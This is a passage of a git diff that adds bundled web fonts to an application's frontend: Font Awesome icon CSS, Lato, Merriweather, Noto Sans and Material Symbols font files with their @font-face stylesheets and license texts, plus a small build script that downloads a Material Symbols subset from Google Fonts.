'\f26d'; +} +.fa-500px:before { + content: '\f26e'; +} +.fa-amazon:before { + content: '\f270'; +} +.fa-calendar-plus-o:before { + content: '\f271'; +} +.fa-calendar-minus-o:before { + content: '\f272'; +} +.fa-calendar-times-o:before { + content: '\f273'; +} +.fa-calendar-check-o:before { + content: '\f274'; +} +.fa-industry:before { + content: '\f275'; +} +.fa-map-pin:before { + content: '\f276'; +} +.fa-map-signs:before { + content: '\f277'; +} +.fa-map-o:before { + content: '\f278'; +} +.fa-map:before { + content: '\f279'; +} +.fa-commenting:before { + content: '\f27a'; +} +.fa-commenting-o:before { + content: '\f27b'; +} +.fa-houzz:before { + content: '\f27c'; +} +.fa-vimeo:before { + content: '\f27d'; +} +.fa-black-tie:before { + content: '\f27e'; +} +.fa-fonticons:before { + content: '\f280'; +} +.fa-reddit-alien:before { + content: '\f281'; +} +.fa-edge:before { + content: '\f282'; +} +.fa-credit-card-alt:before { + content: '\f283'; +} +.fa-codiepie:before { + content: '\f284'; +} +.fa-modx:before { + content: '\f285'; +} +.fa-fort-awesome:before { + content: '\f286'; +} +.fa-usb:before { + content: '\f287'; +} +.fa-product-hunt:before { + content: '\f288'; +} +.fa-mixcloud:before { + content: '\f289'; +} +.fa-scribd:before { + content: '\f28a'; +} +.fa-pause-circle:before { + content: '\f28b'; +} +.fa-pause-circle-o:before { + content: '\f28c'; +} +.fa-stop-circle:before { + content: '\f28d'; +} +.fa-stop-circle-o:before { + content: '\f28e'; +} +.fa-shopping-bag:before { + content: '\f290'; +} +.fa-shopping-basket:before { + content: '\f291'; +} +.fa-hashtag:before { + content: '\f292'; +} +.fa-bluetooth:before { + content: '\f293'; +} +.fa-bluetooth-b:before { + content: '\f294'; +} +.fa-percent:before { + content: '\f295'; +} +.fa-gitlab:before { + content: '\f296'; +} +.fa-wpbeginner:before { + content: '\f297'; +} +.fa-wpforms:before { + content: '\f298'; +} +.fa-envira:before { + content: '\f299'; +} +.fa-universal-access:before { + content: '\f29a'; +} +.fa-wheelchair-alt:before { + content: '\f29b'; +} +.fa-question-circle-o:before { + content: '\f29c'; +} +.fa-blind:before { + content: '\f29d'; +} +.fa-audio-description:before { + content: '\f29e'; +} +.fa-volume-control-phone:before { + content: '\f2a0'; +} +.fa-braille:before { + content: '\f2a1'; +} +.fa-assistive-listening-systems:before { + content: '\f2a2'; +} +.fa-asl-interpreting:before, +.fa-american-sign-language-interpreting:before { + content: '\f2a3'; +} +.fa-deafness:before, +.fa-hard-of-hearing:before, +.fa-deaf:before { + content: '\f2a4'; +} +.fa-glide:before { + content: '\f2a5'; +} +.fa-glide-g:before { + content: '\f2a6'; +} +.fa-signing:before, +.fa-sign-language:before { + content: '\f2a7'; +} +.fa-low-vision:before { + content: '\f2a8'; +} +.fa-viadeo:before { + content: '\f2a9'; +} +.fa-viadeo-square:before { + content: '\f2aa'; +} +.fa-snapchat:before { + content: '\f2ab'; +} +.fa-snapchat-ghost:before { + content: '\f2ac'; +} +.fa-snapchat-square:before { + content: '\f2ad'; +} +.fa-pied-piper:before { + content: '\f2ae'; +} +.fa-first-order:before { + content: '\f2b0'; +} +.fa-yoast:before { + content: '\f2b1'; +} +.fa-themeisle:before { + content: '\f2b2'; +} +.fa-google-plus-circle:before, +.fa-google-plus-official:before { + content: '\f2b3'; +} +.fa-fa:before, +.fa-font-awesome:before { + content: '\f2b4'; +} +.fa-handshake-o:before { + content: '\f2b5'; +} +.fa-envelope-open:before { + content: '\f2b6'; +} +.fa-envelope-open-o:before { + content: '\f2b7'; +} +.fa-linode:before { + content: '\f2b8'; +} +.fa-address-book:before { + content: '\f2b9'; +} +.fa-address-book-o:before { + content: '\f2ba'; +} +.fa-vcard:before, +.fa-address-card:before { + content: '\f2bb'; +} +.fa-vcard-o:before, +.fa-address-card-o:before { + content: '\f2bc'; +} +.fa-user-circle:before { + content: '\f2bd'; +} +.fa-user-circle-o:before { + content: '\f2be'; +} +.fa-user-o:before { + content: '\f2c0'; +} +.fa-id-badge:before { + content: '\f2c1'; +} +.fa-drivers-license:before, +.fa-id-card:before { + content: '\f2c2'; +} +.fa-drivers-license-o:before, +.fa-id-card-o:before { + content: '\f2c3'; +} +.fa-quora:before { + content: '\f2c4'; +} +.fa-free-code-camp:before { + content: '\f2c5'; +} +.fa-telegram:before { + content: '\f2c6'; +} +.fa-thermometer-4:before, +.fa-thermometer:before, +.fa-thermometer-full:before { + content: '\f2c7'; +} +.fa-thermometer-3:before, +.fa-thermometer-three-quarters:before { + content: '\f2c8'; +} +.fa-thermometer-2:before, +.fa-thermometer-half:before { + content: '\f2c9'; +} +.fa-thermometer-1:before, +.fa-thermometer-quarter:before { + content: '\f2ca'; +} +.fa-thermometer-0:before, +.fa-thermometer-empty:before { + content: '\f2cb'; +} +.fa-shower:before { + content: '\f2cc'; +} +.fa-bathtub:before, +.fa-s15:before, +.fa-bath:before { + content: '\f2cd'; +} +.fa-podcast:before { + content: '\f2ce'; +} +.fa-window-maximize:before { + content: '\f2d0'; +} +.fa-window-minimize:before { + content: '\f2d1'; +} +.fa-window-restore:before { + content: '\f2d2'; +} +.fa-times-rectangle:before, +.fa-window-close:before { + content: '\f2d3'; +} +.fa-times-rectangle-o:before, +.fa-window-close-o:before { + content: '\f2d4'; +} +.fa-bandcamp:before { + content: '\f2d5'; +} +.fa-grav:before { + content: '\f2d6'; +} +.fa-etsy:before { + content: '\f2d7'; +} +.fa-imdb:before { + content: '\f2d8'; +} +.fa-ravelry:before { + content: '\f2d9'; +} +.fa-eercast:before { + content: '\f2da'; +} +.fa-microchip:before { + content: '\f2db'; +} +.fa-snowflake-o:before { + content: '\f2dc'; +} +.fa-superpowers:before { + content: '\f2dd'; +} +.fa-wpexplorer:before { + content: '\f2de'; +} +.fa-meetup:before { + content: '\f2e0'; +} +.sr-only { + position: absolute; + width: 1px; + height: 1px; + padding: 0; + margin: -1px; + overflow: hidden; + clip: rect(0, 0, 0, 0); + border: 0; +} +.sr-only-focusable:active, +.sr-only-focusable:focus { + position: static; + width: auto; + height: auto; + margin: 0; + overflow: visible; + clip: auto; +} diff --git a/services/web/frontend/fonts/font-awesome/fontawesome-webfont.woff2 b/services/web/frontend/fonts/font-awesome/fontawesome-webfont.woff2 new file mode 100644 index 0000000..4d13fc6 Binary files /dev/null and b/services/web/frontend/fonts/font-awesome/fontawesome-webfont.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-Bold.woff2 b/services/web/frontend/fonts/lato/LatoLatin-Bold.woff2 new file mode 100644 index 0000000..2615c85 Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-Bold.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-BoldItalic.woff2 b/services/web/frontend/fonts/lato/LatoLatin-BoldItalic.woff2 new file mode 100644 index 0000000..f7bace1 Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-BoldItalic.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-Italic.woff2 b/services/web/frontend/fonts/lato/LatoLatin-Italic.woff2 new file mode 100644 index 0000000..aaa5a35 Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-Italic.woff2 differ diff --git a/services/web/frontend/fonts/lato/LatoLatin-Regular.woff2 b/services/web/frontend/fonts/lato/LatoLatin-Regular.woff2 new file mode 100644 index 0000000..a4d084b Binary files /dev/null and b/services/web/frontend/fonts/lato/LatoLatin-Regular.woff2 differ diff --git a/services/web/frontend/fonts/lato/OFL.txt b/services/web/frontend/fonts/lato/OFL.txt new file mode 100755 index 0000000..6d2c416 --- /dev/null +++ b/services/web/frontend/fonts/lato/OFL.txt @@ -0,0 +1,94 @@ +Copyright (c) 2010-2015, Łukasz Dziedzic (dziedzic@typoland.com), +with Reserved Font Name Lato. + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/lato/lato.css b/services/web/frontend/fonts/lato/lato.css new file mode 100644 index 0000000..38c9eca --- /dev/null +++ b/services/web/frontend/fonts/lato/lato.css @@ -0,0 +1,27 @@ +@font-face { + font-family: 'Lato'; + font-style: normal; + font-weight: 400; + src: url('LatoLatin-Regular.woff2') format('woff2'); +} + +@font-face { + font-family: 'Lato'; + font-style: italic; + font-weight: 400; + src: url('LatoLatin-Italic.woff2') format('woff2'); +} + +@font-face { + font-family: 'Lato'; + font-style: normal; + font-weight: 700; + src: url('LatoLatin-Bold.woff2') format('woff2'); +} + +@font-face { + font-family: 'Lato'; + font-style: italic; + font-weight: 700; + src: url('LatoLatin-BoldItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/material-symbols/LICENSE.txt b/services/web/frontend/fonts/material-symbols/LICENSE.txt new file mode 100644 index 0000000..7a4a3ea --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/LICENSE.txt @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. \ No newline at end of file diff --git a/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedSlice.woff2 b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedSlice.woff2 new file mode 100644 index 0000000..08d6619 Binary files /dev/null and b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedSlice.woff2 differ diff --git a/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedUnfilledPartialSlice.woff2 b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedUnfilledPartialSlice.woff2 new file mode 100644 index 0000000..14a5ef1 Binary files /dev/null and b/services/web/frontend/fonts/material-symbols/MaterialSymbolsRoundedUnfilledPartialSlice.woff2 differ diff --git a/services/web/frontend/fonts/material-symbols/build-unfilled.mjs b/services/web/frontend/fonts/material-symbols/build-unfilled.mjs new file mode 100644 index 0000000..1c37bc9 --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/build-unfilled.mjs @@ -0,0 +1,48 @@ +import path from 'node:path' +import fs from 'node:fs/promises' +import icons from './unfilled-symbols.mjs' + +const iconList = [...new Set(icons)].sort().map(encodeURIComponent).join(',') + +const url = `https://fonts.googleapis.com/css2?family=Material+Symbols+Rounded:opsz,wght,FILL,GRAD@20,400,0,0&icon_names=${iconList}&display=block` +console.log(`Fetching font configuration from ${url}`) + +const cssFile = await ( + await fetch(url, { + headers: { + // Specify a user agent to get a woff2 file + 'User-Agent': + 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36', + }, + }) +).text() + +const woff2UrlText = cssFile.match(/url\(([^)]+)\) format\('woff2'\)/)?.[1] + +if (!woff2UrlText) { + throw new Error( + 'Could not find woff2 URL in CSS file, try accessing the font configuration URL to check whether an error is reported' + ) +} + +const woff2Url = new URL(woff2UrlText) +if (woff2Url.protocol !== 'https:') { + throw new Error(`Expected HTTPS URL, got ${woff2Url.protocol}`) +} +if (woff2Url.hostname !== 'fonts.gstatic.com') { + throw new Error( + `Expected to download font from fonts.gstatic.com, got ${woff2Url.hostname}` + ) +} + +console.log(`Fetching woff2 file: ${woff2Url}`) + +const outputPath = path.join( + import.meta.dirname, + 'MaterialSymbolsRoundedUnfilledPartialSlice.woff2' +) + +const res = await fetch(woff2Url) + +console.log(`Saving font file to ${outputPath}`) +await fs.writeFile(outputPath, res.body) diff --git a/services/web/frontend/fonts/material-symbols/material-symbols.css b/services/web/frontend/fonts/material-symbols/material-symbols.css new file mode 100644 index 0000000..6ffcdd4 --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/material-symbols.css @@ -0,0 +1,60 @@ +@font-face { + font-family: 'Material Symbols Rounded'; + font-style: normal; + font-weight: 400; + font-display: block; + /* + Generated from MaterialSymbolsRounded[FILL,GRAD,opsz,wght].woff2 with specific values: + 'FILL' 1, 'wght' 400, 'GRAD' 0, 'opsz' 20 + */ + src: url('MaterialSymbolsRoundedSlice.woff2') format('woff2'); +} + +@font-face { + font-family: 'Material Symbols Rounded Unfilled Partial'; + font-style: normal; + font-weight: 400; + font-display: block; + /* + Generated by frontend/fonts/material-symbols/build-unfilled.mjs + */ + src: url('MaterialSymbolsRoundedUnfilledPartialSlice.woff2') format('woff2'); +} + +.material-symbols { + font-family: 'Material Symbols Rounded'; + font-weight: normal; + font-style: normal; + font-size: 20px; + font-variation-settings: + 'FILL' 1, + 'wght' 400, + 'GRAD' 0, + 'opsz' 20; + line-height: 1; + letter-spacing: normal; + text-transform: none; + display: inline-block; + white-space: nowrap; + word-wrap: normal; + direction: ltr; + font-feature-settings: 'liga'; + -webkit-font-smoothing: antialiased; + + &.size-2x { + font-size: 2em; + } + + &.rotate-180 { + transform: rotate(180deg); + } + + &.unfilled { + font-family: 'Material Symbols Rounded Unfilled Partial'; + font-variation-settings: + 'FILL' 0, + 'wght' 400, + 'GRAD' 0, + 'opsz' 20; + } +} diff --git a/services/web/frontend/fonts/material-symbols/unfilled-symbols.mjs b/services/web/frontend/fonts/material-symbols/unfilled-symbols.mjs new file mode 100644 index 0000000..eca63fa --- /dev/null +++ b/services/web/frontend/fonts/material-symbols/unfilled-symbols.mjs @@ -0,0 +1,28 @@ +// @ts-check +// Make sure to run the build-unfilled.mjs script after updating this list +// to update the font file with the latest icons. +// You may need to hard reload your browser window to see the changes. + +export default /** @type {const} */ ([ + 'book_5', + 'brush', + 'code', + 'create_new_folder', + 'description', + 'experiment', + 'forum', + 'help', + 'image', + 'info', + 'integration_instructions', + 'note_add', + 'picture_as_pdf', + 'rate_review', + 'report', + 'settings', + 'space_dashboard', + 'table_chart', + 'upload_file', + 'web_asset', + 'error', +]) diff --git a/services/web/frontend/fonts/merriweather/Merriweather-Bold.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-Bold.woff2 new file mode 100644 index 0000000..92d9d8a Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-Bold.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/Merriweather-BoldItalic.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-BoldItalic.woff2 new file mode 100644 index 0000000..33324b2 Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-BoldItalic.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/Merriweather-Italic.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-Italic.woff2 new file mode 100644 index 0000000..828c324 Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-Italic.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/Merriweather-Regular.woff2 b/services/web/frontend/fonts/merriweather/Merriweather-Regular.woff2 new file mode 100644 index 0000000..e5134cd Binary files /dev/null and b/services/web/frontend/fonts/merriweather/Merriweather-Regular.woff2 differ diff --git a/services/web/frontend/fonts/merriweather/OFL.txt b/services/web/frontend/fonts/merriweather/OFL.txt new file mode 100644 index 0000000..042a4c4 --- /dev/null +++ b/services/web/frontend/fonts/merriweather/OFL.txt @@ -0,0 +1,93 @@ +Copyright 2016 The Merriweather Project Authors (https://github.com/EbenSorkin/Merriweather), with Reserved Font Name "Merriweather". + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in which fonts may be shared and improved in partnership +with others. + +The OFL allows the licensed fonts to be used, studied, modified and +redistributed freely as long as they are not sold by themselves. The +fonts, including any derivative works, can be bundled, embedded, +redistributed and/or sold with any software provided that any reserved +names are not used by derivative works. The fonts and derivatives, +however, cannot be released under any other type of license. The +requirement for fonts to remain under this license does not apply +to any document created using the fonts or their derivatives. + +DEFINITIONS +"Font Software" refers to the set of files released by the Copyright +Holder(s) under this license and clearly marked as such. This may +include source files, build scripts and documentation. + +"Reserved Font Name" refers to any names specified as such after the +copyright statement(s). + +"Original Version" refers to the collection of Font Software components as +distributed by the Copyright Holder(s). + +"Modified Version" refers to any derivative made by adding to, deleting, +or substituting -- in part or in whole -- any of the components of the +Original Version, by changing formats or by porting the Font Software to a +new environment. + +"Author" refers to any designer, engineer, programmer, technical +writer or other person who contributed to the Font Software. + +PERMISSION & CONDITIONS +Permission is hereby granted, free of charge, to any person obtaining +a copy of the Font Software, to use, study, copy, merge, embed, modify, +redistribute, and sell modified and unmodified copies of the Font +Software, subject to the following conditions: + +1) Neither the Font Software nor any of its individual components, +in Original or Modified Versions, may be sold by itself. + +2) Original or Modified Versions of the Font Software may be bundled, +redistributed and/or sold with any software, provided that each copy +contains the above copyright notice and this license. These can be +included either as stand-alone text files, human-readable headers or +in the appropriate machine-readable metadata fields within text or +binary files as long as those fields can be easily viewed by the user. + +3) No Modified Version of the Font Software may use the Reserved Font +Name(s) unless explicit written permission is granted by the corresponding +Copyright Holder. This restriction only applies to the primary font name as +presented to the users. + +4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font +Software shall not be used to promote, endorse or advertise any +Modified Version, except to acknowledge the contribution(s) of the +Copyright Holder(s) and the Author(s) or with their explicit written +permission. + +5) The Font Software, modified or unmodified, in part or in whole, +must be distributed entirely under this license, and must not be +distributed under any other license. The requirement for fonts to +remain under this license does not apply to any document created +using the Font Software. + +TERMINATION +This license becomes null and void if any of the above conditions are +not met. + +DISCLAIMER +THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT +OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE +COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL +DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM +OTHER DEALINGS IN THE FONT SOFTWARE. diff --git a/services/web/frontend/fonts/merriweather/merriweather.css b/services/web/frontend/fonts/merriweather/merriweather.css new file mode 100644 index 0000000..a2aef42 --- /dev/null +++ b/services/web/frontend/fonts/merriweather/merriweather.css @@ -0,0 +1,24 @@ +@font-face { + font-family: 'Merriweather'; + font-style: normal; + font-weight: 400; + src: url('Merriweather-Regular.woff2') format('woff2'); +} +@font-face { + font-family: 'Merriweather'; + font-style: italic; + font-weight: 400; + src: url('Merriweather-Italic.woff2') format('woff2'); +} +@font-face { + font-family: 'Merriweather'; + font-style: normal; + font-weight: 700; + src: url('Merriweather-Bold.woff2') format('woff2'); +} +@font-face { + font-family: 'Merriweather'; + font-style: italic; + font-weight: 700; + src: url('Merriweather-BoldItalic.woff2') format('woff2'); +} diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-Italic.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-Italic.woff2 new file mode 100644 index 0000000..0894d11 Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-Italic.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-Medium.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-Medium.woff2 new file mode 100644 index 0000000..769583f Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-Medium.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-MediumItalic.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-MediumItalic.woff2 new file mode 100644 index 0000000..10e723f Binary files /dev/null and b/services/web/frontend/fonts/noto-sans/NotoSans-MediumItalic.woff2 differ diff --git a/services/web/frontend/fonts/noto-sans/NotoSans-Regular.woff2 b/services/web/frontend/fonts/noto-sans/NotoSans-Regular.woff2 new file mode 100644 index 